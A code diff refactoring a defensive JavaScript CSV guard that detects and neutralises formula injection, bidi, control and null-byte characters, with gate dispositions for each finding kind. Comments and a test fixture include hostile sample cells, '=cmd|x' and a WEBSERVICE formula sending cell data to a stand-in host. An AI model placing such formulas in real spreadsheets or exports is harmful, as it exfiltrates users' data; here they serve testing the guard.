|
-
nullSemantics: "empty-string",
|
|
244
228
|
nullMarker: "\\N",
|
|
245
229
|
preserveLeadingZeros: false,
|
|
246
230
|
preserveBooleanStrings: false,
|
|
247
231
|
preserveDateStrings: false,
|
|
248
|
-
dateFormat: "iso8601",
|
|
249
|
-
numericPrecisionPolicy: "decimal-string-above-safe-int",
|
|
250
232
|
piiPolicy: "preserve",
|
|
251
233
|
forensicSnippetBytes: 0,
|
|
252
|
-
mode: "enforce",
|
|
253
234
|
maxRuntimeMs: C.TIME.seconds(30),
|
|
254
235
|
});
|
|
255
236
|
|
|
256
|
-
var COMPLIANCE_POSTURES =
|
|
257
|
-
"hipaa": {
|
|
258
|
-
formulaInjectionPolicy: "prefix-tab",
|
|
259
|
-
bidiCharPolicy: "reject",
|
|
260
|
-
controlCharPolicy: "reject",
|
|
261
|
-
nullByteHandling: "reject",
|
|
262
|
-
piiPolicy: "redact",
|
|
263
|
-
forensicSnippetBytes: FORENSIC_SNIPPET_HIPAA,
|
|
264
|
-
},
|
|
265
|
-
"pci-dss": {
|
|
266
|
-
formulaInjectionPolicy: "prefix-tab",
|
|
267
|
-
bidiCharPolicy: "reject",
|
|
268
|
-
controlCharPolicy: "reject",
|
|
269
|
-
nullByteHandling: "reject",
|
|
270
|
-
piiPolicy: "redact",
|
|
271
|
-
forensicSnippetBytes: FORENSIC_SNIPPET_PCI_DSS,
|
|
272
|
-
},
|
|
273
|
-
"gdpr": {
|
|
274
|
-
formulaInjectionPolicy: "prefix-tab",
|
|
275
|
-
bidiCharPolicy: "strip",
|
|
276
|
-
controlCharPolicy: "strip",
|
|
277
|
-
piiPolicy: "redact",
|
|
278
|
-
forensicSnippetBytes: FORENSIC_SNIPPET_GDPR,
|
|
279
|
-
},
|
|
280
|
-
"soc2": {
|
|
281
|
-
formulaInjectionPolicy: "prefix-tab",
|
|
282
|
-
bidiCharPolicy: "reject",
|
|
283
|
-
controlCharPolicy: "reject",
|
|
284
|
-
nullByteHandling: "reject",
|
|
285
|
-
forensicSnippetBytes: FORENSIC_SNIPPET_SOC2,
|
|
286
|
-
},
|
|
287
|
-
});
|
|
237
|
+
var COMPLIANCE_POSTURES = gateContract.compliancePostures(PROFILES, { base: 256, overlays: { hipaa: { piiPolicy: "redact" }, "pci-dss": { piiPolicy: "redact" }, gdpr: { piiPolicy: "redact" } } });
|
|
288
238
|
|
|
289
239
|
// ---- Internal helpers ----
|
|
290
240
|
|
|
@@ -307,37 +257,17 @@ function _detectIssues(text, opts) {
|
|
|
307
257
|
});
|
|
308
258
|
}
|
|
309
259
|
|
|
310
|
-
|
|
311
|
-
|
|
312
|
-
|
|
313
|
-
|
|
314
|
-
|
|
315
|
-
|
|
316
|
-
|
|
317
|
-
|
|
318
|
-
|
|
319
|
-
|
|
320
|
-
}
|
|
321
|
-
|
|
322
|
-
if (opts.controlCharPolicy !== "allow") {
|
|
323
|
-
var ctrlMatch = _firstMatch(text, C0_CTRL_RE);
|
|
324
|
-
if (ctrlMatch) {
|
|
325
|
-
issues.push({
|
|
326
|
-
kind: "control-char", severity: "high", ruleId: "csv.control",
|
|
327
|
-
location: ctrlMatch.index,
|
|
328
|
-
snippet: "C0 control char U+" + ctrlMatch.char.charCodeAt(0).toString(HEX_RADIX) +
|
|
329
|
-
" at byte " + ctrlMatch.index,
|
|
330
|
-
});
|
|
331
|
-
}
|
|
332
|
-
}
|
|
333
|
-
|
|
334
|
-
var nullIdx = text.indexOf(NULL_BYTE);
|
|
335
|
-
if (nullIdx >= 0 && opts.nullByteHandling !== "allow") {
|
|
336
|
-
issues.push({
|
|
337
|
-
kind: "null-byte", severity: "critical", ruleId: "csv.null-byte",
|
|
338
|
-
location: nullIdx, snippet: "null byte at " + nullIdx,
|
|
339
|
-
});
|
|
340
|
-
}
|
|
260
|
+
// Bidi / null / control / zero-width via the shared codepoint class. CSV
|
|
261
|
+
// exposes its own policy vocabulary (bidiCharPolicy / controlCharPolicy /
|
|
262
|
+
// nullByteHandling), normalized here to the shared detector's names so the
|
|
263
|
+
// per-class match-and-push blocks live in exactly one place; zero-width is
|
|
264
|
+
// always scanned (warn) since CSV ships no zeroWidthPolicy.
|
|
265
|
+
issues.push.apply(issues, codepointClass.detectCharThreats(text, {
|
|
266
|
+
bidiPolicy: opts.bidiCharPolicy,
|
|
267
|
+
controlPolicy: opts.controlCharPolicy,
|
|
268
|
+
nullBytePolicy: opts.nullByteHandling,
|
|
269
|
+
zeroWidthPolicy: opts.zeroWidthPolicy || "audit",
|
|
270
|
+
}, "csv", "warn"));
|
|
341
271
|
|
|
342
272
|
if (opts.homoglyphPolicy !== "allow" && /[A-Za-z]/.test(text)) {
|
|
343
273
|
var homoMatch = _firstMatch(text, HOMOGLYPH_RE);
|
|
@@ -351,15 +281,6 @@ function _detectIssues(text, opts) {
|
|
|
351
281
|
}
|
|
352
282
|
}
|
|
353
283
|
|
|
354
|
-
var zwMatch = _firstMatch(text, ZERO_WIDTH_RE);
|
|
355
|
-
if (zwMatch) {
|
|
356
|
-
issues.push({
|
|
357
|
-
kind: "zero-width", severity: "warn", ruleId: "csv.zero-width",
|
|
358
|
-
location: zwMatch.index,
|
|
359
|
-
snippet: "zero-width char U+" + zwMatch.char.charCodeAt(0).toString(HEX_RADIX) +
|
|
360
|
-
" at byte " + zwMatch.index,
|
|
361
|
-
});
|
|
362
|
-
}
|
|
363
284
|
|
|
364
285
|
if (opts.formulaInjectionPolicy !== "audit-only" && opts.formulaInjectionPolicy !== "allow") {
|
|
365
286
|
// Strip ZWSP / RTLO / LRM / RLM / BOM at cell-start before the
|
|
@@ -441,15 +362,8 @@ function _stripIssues(text, opts) {
|
|
|
441
362
|
return out;
|
|
442
363
|
}
|
|
443
364
|
|
|
444
|
-
|
|
445
|
-
|
|
446
|
-
profiles: PROFILES,
|
|
447
|
-
compliancePostures: COMPLIANCE_POSTURES,
|
|
448
|
-
defaults: DEFAULTS,
|
|
449
|
-
errorClass: GuardCsvError,
|
|
450
|
-
errCodePrefix: "csv",
|
|
451
|
-
});
|
|
452
|
-
}
|
|
365
|
+
// _resolveOpts removed — the generated guard exposes the bound resolver as
|
|
366
|
+
// module.exports.resolveOpts (defineGuard owns the profile/posture binding).
|
|
453
367
|
|
|
454
368
|
// ---- Cell-level escape with full threat application ----
|
|
455
369
|
|
|
@@ -505,8 +419,10 @@ function escapeCell(value, opts) {
|
|
|
505
419
|
opts = Object.assign({}, DEFAULTS, opts || {});
|
|
506
420
|
var str = value == null ? "" : String(value);
|
|
507
421
|
|
|
508
|
-
|
|
509
|
-
|
|
422
|
+
var cellBytes = Buffer.byteLength(str, "utf8");
|
|
423
|
+
if (cellBytes > opts.maxCellBytes) {
|
|
424
|
+
throw _err("csv.cell-too-large",
|
|
425
|
+
"cell is " + cellBytes + " bytes, exceeds maxCellBytes " + opts.maxCellBytes);
|
|
510
426
|
}
|
|
511
427
|
|
|
512
428
|
if (opts.nullByteHandling === "reject" && str.indexOf(NULL_BYTE) !== -1) {
|
|
@@ -673,7 +589,7 @@ function schema(spec) {
|
|
|
673
589
|
}, opts));
|
|
674
590
|
},
|
|
675
591
|
validate: function (input, opts) {
|
|
676
|
-
return validate(input, Object.assign({ schema: spec }, opts || {}));
|
|
592
|
+
return module.exports.validate(input, Object.assign({ schema: spec }, opts || {}));
|
|
677
593
|
},
|
|
678
594
|
columns: cols,
|
|
679
595
|
};
|
|
@@ -728,7 +644,7 @@ function schema(spec) {
|
|
|
728
644
|
* out.indexOf("\r\n") !== -1; // → true
|
|
729
645
|
*/
|
|
730
646
|
function serialize(rows, opts) {
|
|
731
|
-
opts =
|
|
647
|
+
opts = module.exports.resolveOpts(opts);
|
|
732
648
|
numericBounds.requireAllPositiveFiniteIntIfPresent(opts,
|
|
733
649
|
["maxRows", "maxCellBytes", "maxTotalBytes"],
|
|
734
650
|
"guardCsv.serialize", GuardCsvError, "csv.bad-opt");
|
|
@@ -838,10 +754,9 @@ function serialize(rows, opts) {
|
|
|
838
754
|
* rv.ok; // → false
|
|
839
755
|
* rv.issues.some(function (i) { return i.kind === "dangerous-function"; }); // → true
|
|
840
756
|
*/
|
|
841
|
-
|
|
842
|
-
|
|
843
|
-
|
|
844
|
-
}
|
|
757
|
+
// validate is generated by defineGuard from `detect` (_detectIssues) under the
|
|
758
|
+
// "text" input contract — runIssueValidator(input, resolved, _detectIssues,
|
|
759
|
+
// "text") — identical to the hand-written wrapper this replaced.
|
|
845
760
|
|
|
846
761
|
/**
|
|
847
762
|
* @primitive b.guardCsv.sanitize
|
|
@@ -885,23 +800,11 @@ function validate(input, opts) {
|
|
|
885
800
|
* });
|
|
886
801
|
* clean.indexOf(ZWSP) === -1; // → true
|
|
887
802
|
*/
|
|
888
|
-
|
|
889
|
-
|
|
890
|
-
|
|
891
|
-
|
|
892
|
-
|
|
893
|
-
if (text == null) {
|
|
894
|
-
throw _err("csv.bad-input", "sanitize requires string or Buffer input");
|
|
895
|
-
}
|
|
896
|
-
var sanitized = _stripIssues(text, opts);
|
|
897
|
-
var amplification = sanitized.length / Math.max(text.length, 1);
|
|
898
|
-
if (amplification > opts.sanitizeAmplificationCap) {
|
|
899
|
-
throw _err("csv.sanitize-amplified",
|
|
900
|
-
"sanitize grew output " + amplification.toFixed(2) +
|
|
901
|
-
"x; cap " + opts.sanitizeAmplificationCap);
|
|
902
|
-
}
|
|
903
|
-
return sanitized;
|
|
904
|
-
}
|
|
803
|
+
// sanitize is generated by defineGuard from `sanitizeTransform` (_stripIssues)
|
|
804
|
+
// with sanitizeSeverities:[] (strip unconditionally, never refuse on a detected
|
|
805
|
+
// issue) and sanitizeAmplificationCap:"sanitizeAmplificationCap" (the "sanitize
|
|
806
|
+
// must shrink, never grow" post-condition that throws csv.sanitize-amplified) —
|
|
807
|
+
// identical to the hand-written scrubber this replaced.
|
|
905
808
|
|
|
906
809
|
/**
|
|
907
810
|
* @primitive b.guardCsv.detect
|
|
@@ -975,12 +878,14 @@ function detect(input) {
|
|
|
975
878
|
* Build a `b.gateContract` gate suitable for plugging into
|
|
976
879
|
* `b.staticServe({ contentSafety: { ".csv": gate } })`,
|
|
977
880
|
* `b.fileUpload({ contentSafety: { "text/csv": gate } })`,
|
|
978
|
-
* `b.mail`, or `b.objectStore`.
|
|
979
|
-
*
|
|
980
|
-
* `
|
|
981
|
-
*
|
|
982
|
-
*
|
|
983
|
-
*
|
|
881
|
+
* `b.mail`, or `b.objectStore`. Each finding's action is the one the
|
|
882
|
+
* operator's policy for that class selected: `serve` (no issues) →
|
|
883
|
+
* `audit-only` (observe-only findings) → `sanitize` (a class set to a
|
|
884
|
+
* mitigation — formula `prefix-tab`, bidi/control `strip` — so the gate
|
|
885
|
+
* strips, then re-parses + re-serializes when a formula cell is present so
|
|
886
|
+
* escapeCell's mitigation lands) → `refuse` (a class set to `reject`, the
|
|
887
|
+
* dangerous-function denylist, or an ambiguous mixed dialect). `refuse`
|
|
888
|
+
* wins over `sanitize` wins over `audit-only`.
|
|
984
889
|
*
|
|
985
890
|
* Operator extensibility: pass `operatorRules: [{ id, severity,
|
|
986
891
|
* detect: fn(ctx)→boolean, reason }]` to inject custom detectors
|
|
@@ -1004,69 +909,94 @@ function detect(input) {
|
|
|
1004
909
|
* contentSafety: { ".csv": csvGate },
|
|
1005
910
|
* });
|
|
1006
911
|
*
|
|
1007
|
-
* //
|
|
1008
|
-
*
|
|
1009
|
-
*
|
|
1010
|
-
*
|
|
912
|
+
* // A plain formula cell is mitigated in place (strict's formula policy is
|
|
913
|
+
* // prefix-tab — a cell beginning `=`/`+`/`-`/`@` is prefixed with a TAB so
|
|
914
|
+
* // spreadsheets render it as text rather than evaluate it):
|
|
915
|
+
* var formula = Buffer.from("name,formula\r\nalice,=cmd|x\r\n", "utf8");
|
|
916
|
+
* (await csvGate.check({ bytes: formula })).action; // → "sanitize"
|
|
917
|
+
*
|
|
918
|
+
* // A denylisted exfiltration/RCE function refuses — too dangerous to serve
|
|
919
|
+
* // even prefixed:
|
|
920
|
+
* var exfil = Buffer.from('a\r\n=WEBSERVICE("http://x/"&A1)\r\n', "utf8");
|
|
921
|
+
* (await csvGate.check({ bytes: exfil })).action; // → "refuse"
|
|
1011
922
|
*/
|
|
1012
|
-
|
|
1013
|
-
|
|
1014
|
-
|
|
1015
|
-
|
|
1016
|
-
|
|
1017
|
-
|
|
1018
|
-
|
|
1019
|
-
|
|
1020
|
-
|
|
1021
|
-
|
|
1022
|
-
|
|
1023
|
-
|
|
1024
|
-
|
|
1025
|
-
|
|
1026
|
-
|
|
1027
|
-
|
|
1028
|
-
|
|
1029
|
-
|
|
1030
|
-
|
|
1031
|
-
|
|
1032
|
-
|
|
1033
|
-
|
|
1034
|
-
}
|
|
1035
|
-
}
|
|
1036
|
-
var allIssues = rv.issues.concat(operatorIssues);
|
|
923
|
+
// Disposition of each csv finding = what the operator's policy for that class
|
|
924
|
+
// selected (reject → refuse, a mitigation like prefix-tab/strip → sanitize,
|
|
925
|
+
// audit → audit), resolved through gateContract.policyDisposition. The
|
|
926
|
+
// dangerous-function denylist and an ambiguous mixed-dialect always refuse —
|
|
927
|
+
// neither is safe to serve even after a best-effort mitigation; a stray BOM is
|
|
928
|
+
// always strippable; the zero-width / homoglyph observations are audit-only.
|
|
929
|
+
// Exhaustive over every kind _detectIssues can emit (the gate-disposition
|
|
930
|
+
// coverage test enforces it), so the gate never falls back to severity.
|
|
931
|
+
function _gateDispositionFor(issue, opts) {
|
|
932
|
+
switch (issue.kind) {
|
|
933
|
+
case "bidi-override": return gateContract.policyDisposition(opts.bidiCharPolicy);
|
|
934
|
+
case "control-char": return gateContract.policyDisposition(opts.controlCharPolicy);
|
|
935
|
+
case "null-byte": return gateContract.policyDisposition(opts.nullByteHandling);
|
|
936
|
+
case "formula-prefix-cell": return gateContract.policyDisposition(opts.formulaInjectionPolicy);
|
|
937
|
+
case "homoglyph": return gateContract.policyDisposition(opts.homoglyphPolicy);
|
|
938
|
+
case "bom-mid-stream": return "sanitize";
|
|
939
|
+
case "zero-width": return "sanitize";
|
|
940
|
+
case "dangerous-function": return "refuse";
|
|
941
|
+
case "dialect-mixed-line-endings": return "refuse";
|
|
942
|
+
default: return null;
|
|
943
|
+
}
|
|
944
|
+
}
|
|
1037
945
|
|
|
1038
|
-
|
|
1039
|
-
|
|
1040
|
-
|
|
1041
|
-
|
|
1042
|
-
|
|
1043
|
-
|
|
946
|
+
// Operator-injected rules run as detect-only findings. The guard owns no
|
|
947
|
+
// sanitizer for them, so buildContentGate treats a refusal-severity hit as
|
|
948
|
+
// refuse (it cannot serve a "sanitized" output that still carries the rule's
|
|
949
|
+
// finding). Best-effort: a throwing detector is skipped — the framework cannot
|
|
950
|
+
// crash a request because an operator rule mishandled bytes.
|
|
951
|
+
function _gateOperatorIssues(text, opts, ctx) {
|
|
952
|
+
var out = [];
|
|
953
|
+
if (!Array.isArray(opts.operatorRules)) return out;
|
|
954
|
+
for (var i = 0; i < opts.operatorRules.length; i += 1) {
|
|
955
|
+
var rule = opts.operatorRules[i];
|
|
956
|
+
try {
|
|
957
|
+
if (rule.detect && rule.detect({ bytes: text, ctx: ctx })) {
|
|
958
|
+
// Default an operator rule that fires to refusal severity: the gate owns
|
|
959
|
+
// no sanitizer for operator findings, so an unspecified-severity rule
|
|
960
|
+
// BLOCKS by default (the operator wrote it to catch something) — they
|
|
961
|
+
// opt DOWN to "warn" to observe-only, never silently up to serve.
|
|
962
|
+
out.push({
|
|
963
|
+
kind: rule.id, severity: rule.severity || "high",
|
|
964
|
+
ruleId: rule.id, snippet: rule.reason || rule.id,
|
|
965
|
+
});
|
|
1044
966
|
}
|
|
967
|
+
} catch (_e) { /* operator rule best-effort */ }
|
|
968
|
+
}
|
|
969
|
+
return out;
|
|
970
|
+
}
|
|
1045
971
|
|
|
1046
|
-
|
|
1047
|
-
|
|
1048
|
-
|
|
1049
|
-
|
|
1050
|
-
|
|
1051
|
-
|
|
1052
|
-
|
|
1053
|
-
|
|
1054
|
-
|
|
1055
|
-
|
|
1056
|
-
|
|
1057
|
-
|
|
1058
|
-
|
|
1059
|
-
|
|
1060
|
-
|
|
1061
|
-
|
|
1062
|
-
|
|
1063
|
-
issues: allIssues,
|
|
1064
|
-
};
|
|
1065
|
-
} catch (_e) { /* fall through to refuse */ }
|
|
1066
|
-
}
|
|
972
|
+
// Gate sanitize: strip the removable findings, then — when a formula / dangerous
|
|
973
|
+
// cell survives the strip — reparse + reserialize so escapeCell applies the
|
|
974
|
+
// operator's formula mitigation (prefix-tab / wrap-with-quotes). The mitigation
|
|
975
|
+
// is in-place (a TAB-prefixed cell is inert in a spreadsheet but still matches
|
|
976
|
+
// the cell-boundary formula scan), so the gate trusts this output rather than
|
|
977
|
+
// re-validating it. Returns bytes.
|
|
978
|
+
function _gateProduceSanitized(text, opts) {
|
|
979
|
+
var clean = module.exports.sanitize(text, opts);
|
|
980
|
+
var hasFormula = _detectIssues(clean, opts).some(function (i) {
|
|
981
|
+
return i.kind === "formula-prefix-cell" || i.kind === "dangerous-function";
|
|
982
|
+
});
|
|
983
|
+
if (hasFormula) {
|
|
984
|
+
var rows = csv.parse(clean, { header: false });
|
|
985
|
+
clean = serialize(rows, Object.assign({}, opts, { headers: false }));
|
|
986
|
+
}
|
|
987
|
+
return Buffer.from(clean, "utf8");
|
|
988
|
+
}
|
|
1067
989
|
|
|
1068
|
-
|
|
1069
|
-
|
|
990
|
+
function gate(opts) {
|
|
991
|
+
opts = module.exports.resolveOpts(opts);
|
|
992
|
+
return gateContract.buildContentGate({
|
|
993
|
+
name: opts.name || "guardCsv:" + (opts.profile || "default"),
|
|
994
|
+
opts: opts,
|
|
995
|
+
validate: module.exports.validate,
|
|
996
|
+
dispositionFor: _gateDispositionFor,
|
|
997
|
+
extraIssues: _gateOperatorIssues,
|
|
998
|
+
produceSanitized: _gateProduceSanitized,
|
|
999
|
+
});
|
|
1070
1000
|
}
|
|
1071
1001
|
|
|
1072
1002
|
// buildProfile / compliancePosture / loadRulePack are assembled by
|
|
@@ -1081,10 +1011,11 @@ var INTEGRATION_FIXTURES = Object.freeze({
|
|
|
1081
1011
|
contentType: "text/csv",
|
|
1082
1012
|
extension: ".csv",
|
|
1083
1013
|
benignBytes: Buffer.from("name,age\r\nalice,30\r\n", "utf8"),
|
|
1084
|
-
// Hostile: cell
|
|
1085
|
-
//
|
|
1086
|
-
// gate
|
|
1087
|
-
|
|
1014
|
+
// Hostile: a cell invokes a denylisted exfiltration function (WEBSERVICE) —
|
|
1015
|
+
// an RCE / data-exfil vector too dangerous to serve even mitigated, so the
|
|
1016
|
+
// gate refuses (a plain formula prefix-cell would instead be sanitized in
|
|
1017
|
+
// place by the strict profile's prefix-tab policy).
|
|
1018
|
+
hostileBytes: Buffer.from('name,formula\r\nalice,=WEBSERVICE("http://x/"&A1)\r\n', "utf8"),
|
|
1088
1019
|
});
|
|
1089
1020
|
|
|
1090
1021
|
// Assembled from the gate-contract guard factory: error class, registry
|
|
@@ -1104,10 +1035,18 @@ module.exports = gateContract.defineGuard({
|
|
|
1104
1035
|
mimeTypes: ["text/csv"],
|
|
1105
1036
|
extensions: [".csv"],
|
|
1106
1037
|
integrationFixtures: INTEGRATION_FIXTURES,
|
|
1107
|
-
validate
|
|
1108
|
-
|
|
1038
|
+
// validate + sanitize generated from detect/sanitizeTransform. "text" input
|
|
1039
|
+
// contract (string/Buffer→utf8, bad-input otherwise — _detectIssues returns
|
|
1040
|
+
// [] on a non-string, so the contract owns the refusal). sanitizeSeverities
|
|
1041
|
+
// [] strips unconditionally; sanitizeAmplificationCap enforces shrink.
|
|
1042
|
+
inputContract: "text",
|
|
1043
|
+
detect: _detectIssues,
|
|
1044
|
+
sanitizeTransform: _stripIssues,
|
|
1045
|
+
sanitizeSeverities: [],
|
|
1046
|
+
sanitizeAmplificationCap: "sanitizeAmplificationCap",
|
|
1109
1047
|
gate: gate,
|
|
1110
1048
|
extra: {
|
|
1049
|
+
_gateDispositionForTest: _gateDispositionFor,
|
|
1111
1050
|
serialize: serialize,
|
|
1112
1051
|
escapeCell: escapeCell,
|
|
1113
1052
|
detect: detect,
|